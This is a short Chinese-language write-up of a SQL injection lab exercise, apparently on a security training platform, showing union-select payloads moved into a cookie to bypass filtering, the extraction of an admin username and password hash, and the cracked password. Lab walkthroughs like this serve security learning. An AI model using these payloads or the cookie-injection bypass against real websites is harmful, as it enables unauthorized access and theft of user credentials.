sql绕过注入

sql绕过注入我推荐在https://hack.zkaq.cn/battle#bid=7f163d38c63890ed 这个官网上学习
下面是我在这个官网学习的一个过程
order by 猜数字

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

http://kypt8004.ia.aqlab.cn/shownews.asp?id=171 union select 1,2,3,4,5,6,7,8,9,10 form admin

在这里会报错 因为需要绕过才能注入。

因此需要在网站上载入插件 cookie 或者 ModHeader 都可以

在添加完差键后需要在插件上添加一个新的运行
然后输入cookie 在后面输入id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
在这里需要用加号来表示空格。

然后就可以进行注入password,user,naem,username.......
等等的进行注入尝试。
最终尝试的结果为：
id=171+union+select+1,2,3,4,5,6,password,username,9,10+from+admin
password：b9a2a2b5dffb918c
username：admin
在这里的password是需要去解密的解密完的密码为welcome
然后登陆一下就可以或许需要的钥匙密码